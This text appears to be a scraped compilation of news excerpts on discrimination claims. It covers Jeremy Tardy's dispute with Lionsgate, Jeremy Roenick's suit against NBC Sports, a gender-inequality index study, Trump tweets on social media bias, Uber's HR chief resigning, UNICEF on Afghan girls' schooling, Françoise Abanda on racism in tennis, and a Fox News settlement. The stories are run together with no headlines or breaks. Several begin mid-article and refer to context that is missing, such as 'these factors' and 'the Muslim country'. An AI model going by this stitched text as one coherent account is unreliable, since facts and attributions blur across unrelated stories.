Jeremy Tardy will not return to Netflix’s Dear White People, citing his negotiating experience with production studio Lionsgate and what he calls “their practices of racial discrimination.”

Lionsgate in response characterized the impasse as “purely financial negotiation regarding deal terms,” and nothing more.

Tardy, who recurred as Rashid Bakr in 11 total episodes over the first three seasons — and whose TV credits also include the recently cancelled 68 Whiskey — detailed in Facebook and Twitter posts that he sought to counter Liongate’s original offer to return for Season 4 but was firmly rebuked. Upon learning that a white cast member had successfully negotiated a pay bump, Tardy allied with six other recurring players to negotiate as a group, but some parties got lured away to take side deals.

Tardy in conclusion called out both Lionsgate and Netflix for “how they have historically undervalued and lowballed people of color.”

In a statement to our sister site Deadline, Lionsgate (to whom Netflix directed all inquiries) said, “This was a purely financial negotiation regarding deal terms. Lionsgate is committed to equal treatment for all talent regardless of race, gender, age or sexual orientation. We are very proud of Dear White People and its place in the national conversation about racial equality and social justice and we look forward to beginning production on its fourth season.”

Tardy’s full statement appears below:

Unfortunately I will not be joining NETFLIX’s Dear White People for its fourth and final season due to my experience with Lionsgate and their practices of racial discrimination.
.
After being offered to return for several episodes my team was notified that our counter offer would not be considered and that the initial offer was the “best and final”. This news was disturbing because one of my white colleagues — being a true ally — revealed that they too had received the same initial offer and had successfully negotiated a counter offer. My team expressed this issue to Lionsgate and the producers maintained their position that the white actor was able to negotiate while I was not- regardless of my credits and experience.

With this information six recurring cast members, along with myself, banded together on Monday, August 31st to pass on Lionsgate’s initial offers. Our stance was to move powerfully as a unit in the negotiation process and, more importantly, to stand on principle because this is not simply a monetary matter. We were all aware of the notorious pay disparities between people of color and our white colleagues on Netflix and Lionsgate shows; so this made it blatantly obvious. However, our collective bargaining power was undermined with side deal offers and lack of transparency. These tactics led to some individuals taking deals before the collective group received a fair and equitable negotiation process.

These companies have recently released statements and even donations in support of the Black Lives Matter movement. I am calling out their shameful practices of discrimination and racial inequality with regard to how they have historically undervalued and lowballed people of color. Politically correct lip service and symbolic gestures do not absolve you of the daily responsibility of doing business in a fair and equitable manner.

The fact that this has occurred behind the scenes of a show which purports to address systemic issues of racism and discrimination displays the very epitome of hypocrisy.

Hockey commentator Jeremy Roenick is firing back at NBC Sports, accusing his former employer of discriminating against him for being straight.

Roenick was fired by NBC Sports back in February after he made sexually suggestive remarks about colleagues Kathryn Tappen and Patrick Sharp on a podcast. Now Roenick has filed a lawsuit against the network in New York Supreme Court, claiming wrongful termination and discrimination based on gender or sexual orientation, according to our sister site Variety.

Roenick’s lawsuit states that figure skating commentator Johnny Weir made “colorful commentary” about skaters’ body parts for NBC Sports during the 2018 Winter Olympics, and when Roenick asked his supervisor about that, the supervisor responded that Weir “is gay and can say whatever.” Roenick’s suit also points to a promotional video featuring Weir and on-air partner Tara Lipinski that included vulgar language; Weir and Lipinski were not suspended or fired.

Roenick also claims that he was fired because the network was retaliating against him for his support of President Donald Trump. When he asked for permission to speak at the 2016 Republican National Convention, he alleges he was told: “You know who you work for. You work for NBC. That would not look good on your NBC record.”

A nine-time NHL All Star who retired in 2009, Roenick joined the NBC Sports team as a commentator and studio analyst the following year. Roenick was suspended and eventually fired for comments he made on a podcast about Tappen and Sharp. Roenick recalled a trip to Portugal that he and his wife Tracey took with Tappen and implied he wanted to have a threesome with her. He also called Sharp “so beautiful” and added that “I wouldn’t say no right away” if Sharp invited him to bed.

The academics, from the University of Missouri in the US and the University of Essex in the UK, used these factors to calculate equality scores for 134 nations, representing 6.8 billion people.

The results are in and, surprisingly, men were found to be more disadvantaged than women in 91 countries while women were more disadvantaged than men in 43. Men are worse off in the US, Russia and most European nations.

“No existing measure of gender inequality fully captures the hardships that are disproportionately experienced by men in many countries and so they do not fully capture the extent to which any specific country is promoting the well-being of all its citizens,” one of the lead researchers, Professor Gijsbert Stoet, explained.

We’re not saying that women in highly developed countries are not experiencing disadvantages in some aspects of their lives. What we are saying is that an ideal measure of gender equality is not biased to the disadvantages of either gender. Doing so, we find a different picture to the one commonly presented in the media.

The research, which was published this week in PLOS ONE, found that the world’s most developed countries came closest to gender equality, with women gaining a slight advantage. In the least developed nations women were nearly always behind men, largely due to a lack of educational opportunities.

“With the BIGI, we are focusing on issues that are important to all women and men in any nation, regardless of level of economic and political development, and by including factors that can disadvantage men as well as women,” Professor David Geary from the University of Missouri said. “Current equality measures are generally biased to highlight women’s issues and thus are not really measures of gender equality.”

For more than a decade the Global Gender Gap Index has been one of the most established measures of national gender inequality. But Professor Stoet argues that it fails to measure issues where men are at a disadvantage, such as harsher punishments for the same crime, compulsory military service and more occupational deaths.

He also says the complexity of the index means it can be difficult to distinguish whether gender differences are the result of social inequalities or personal preference.

“Social media is totally discriminating against Republican/conservative voices. Speaking loudly and clearly for the Trump administration, we won’t let that happen. They are closing down the opinions of many people on the RIGHT, while at the same time doing nothing to others,” Trump wrote.

He went on to call censorship a “very dangerous thing,” while taking the opportunity to slam “fake news.”

“There is nothing so fake as CNN & MSNBC, and yet I do not ask that their sick behavior be removed…”

Trump also questioned “who is making the choices” regarding who gets removed from social media, adding that “mistakes are being made.”

“Let everybody participate, good and bad, and we will all just have to figure it out!” he wrote.

It comes just days after several journalists raised alarm at what they say are baseless complaints sent to Twitter over stories with sensitive topics – including the activities of British spy Christopher Steele and links between Sen. Dianne Feinstein (D-CA) and China. 

Meanwhile, many conservatives recently became outraged when Twitter and Facebook suspended controversial right-wing host Alex Jones of Infowars over so-called “hate speech.”

That decision was defended by Twitter CEO Jack Dorsey, who told The Hill earlier this week that Jones had been posting content that broke Twitter’s terms of service.

Twitter has also acknowledged that a new policy to suppress hate speech has resulted in the search results of some Republican lawmakers being reduced. The company did, however, add that some Democrats have also been affected. On Friday, liberal Australian journalist Caitlin Johnstone was removed from Twitter after tweeting that “the world will be improved” when Sen. John McCain (R-AZ), who is battling brain cancer, “finally dies.” 

As for Facebook, which recently came under fire for suspending the pages of TeleSur and independent sites Venezuelanalysis.com and Haitianalysis.blogspot.com, the social network stated in May that it will be launching a review of anti-conservative bias on the platform.

Trump’s most recent tweets aren’t the first time he’s spoken out against the alleged censoring of conservatives on social media. In July, he said the so-called “shadow banning” of prominent Republicans on Twitter is “discriminatory and illegal.” The term ‘shadow banning’ refers to a situation when a social media user believes they have full access to a platform but other users are prevented from seeing their accounts or messages.

SAN FRANCISCO (Reuters) – Uber Technologies Inc’s Chief People Officer Liane Hornsey resigned in an email to staff on Tuesday, following an investigation into how she handled allegations of racial discrimination at the ride-hailing firm.

The resignation comes after Reuters contacted Uber on Monday about the previously unreported investigation into accusations from anonymous whistleblowers that Hornsey had systematically dismissed internal complaints of racial discrimination.

60 percent of those out-of-school are girls, who are at “a particular disadvantage” due to gender-based discrimination in the Muslim country, the UN Children’s Fund said. The worst situation is currently in the Afghan provinces of Kandahar, Helmand, Wardak, Paktika, Zabul and Uruzgan, where up to 85 per cent of girls are missing out on classes.

Lack of security in conflict areas and displacement of families due to fighting were mentioned as being among the reasons contributing to the first increase in the out-of-school rate in Afghanistan since 2002, UNICEF said in the paper. Poor education facilities and lack of women teachers were also a cause for concern, it added.

“Business as usual is not an option for Afghanistan,” Adele Khodr, UNICEF Afghanistan Representative said, as cited by the agency’s website. “When children are not in school, they are at an increased danger of abuse, exploitation and recruitment.”

There are also 300,000 kids who are currently at risk of dropping out of school. However, the overall dropout rates are quite low in Afghanistan, UNICEF reports, calling the development one of the “rays of hope.” According to the report, 85 per cent of children, who start at primary level are able to complete all the grades, with the figure for secondary schoolers being even higher.

The authors of the report have urged Afghan authorities to ensure safe learning environments, to train more female teachers and to improve pedagogy, as well as calling for the introduction of early education and distance learning, all crucial measures to improve the poor situation of education in the country.

Last week, Taliban militants, who control nearly 15 percent of the country and are fighting the government forces to expand its territory, closed more than 20 schools in the country’s Takhar province, in response to the arrest of one its officials. The move reportedly affected more than 11,000 pupils.

In April, the Afghan Education Ministry said that over 1,000 out of the 17,500 country’s schools were closed, with most of them located in war-torn Kunduz, Helmand and Kandahar Provinces.

The highest ranking female Canadian tennis player, Françoise Abanda, says she'll never receive the same recognition as fellow Montrealer Eugenie Bouchard because of her skin colour.

Abanda's call-out came on social media Wednesday in response to a tweet questioning why she wasn't receiving the same treatment as Bouchard when she hit the top of the Canadian rankings.

“I will never get the same treatment because I am black. It’s the truth!” Abanda’s tweet read.

The Montrealer says she has experienced racism throughout her tennis career and chose to speak out now because she felt her injury — she's currently suffering from a concussion — was ignored and hushed up when she was forced to forfeit her match at the recent Fed Cup.

Abanda is currently ranked 128th in the world. Bouchard, who peaked at 5th internationally in 2014, is currently ranked 169th.

"When you're black, I feel like you don't get the same exposure that you should get for a player ranked 120th," she said in a conference call Wednesday.

"I'm not asking to be exposed as a number one player. I'm not asking to get the same recognition as other players that have achieved more. I'm just saying there's a minimum that I don't even get."

Montreal-born Abanda called racial slur

Abanda said she has a great admiration for Bouchard, and the issue is not with her fellow player but with the treatment she's received as a woman of colour in the world of competitive tennis.

"It's a problem of race, a problem of inferiority and superiority that I'm disappointed that exists in my career," she said.

"I love Montreal but sadly, as I said, because my skin is black I get called African and — I hate to say the word, but — n–ger."

Abanda says she has experienced racism in the sport since she was a child. She recalled a time when she was playing in a provincial under-12 tournament when someone shouted at her to "go back to her own country."

The 21-year-old, whose family is originally from Cameroon, was born in Montreal.

Just 'telling my truth'

Recently, she said, she was slighted by Tennis Canada in a promotional video that included all of the players except for her.

"Do I need to win two Grand Slams to be included in that video? No. It's not normal," she said.

Tennis Canada said Abanda was not in the video because of a technical problem with the portion she filmed that couldn't be reshot because of her schedule.

They did not comment further on the issue.

Abanda said she was speaking out because she's brushed it off for too long, and she does not want future athletes to encounter the same treatment.

"I gave you a few examples, but there are hundreds and hundreds in my head," she said. "I'm speaking today to inspire change of a mentality and to change a problem that's very deep and will take a lot of time."

"I'm just speaking about my personal experience and telling my truth."

Fox News reportedly reached a $ 10 million settlement for several discrimination lawsuits filed by 18 current and former employees, according to The New York Times.

The lawsuits ranged from claims of mistreatment based on racial, gender, and pregnancy, including one that alleged no action was taken after repeated complaints about what was described as “abhorrent, intolerable, unlawful and hostile racial discrimination.”
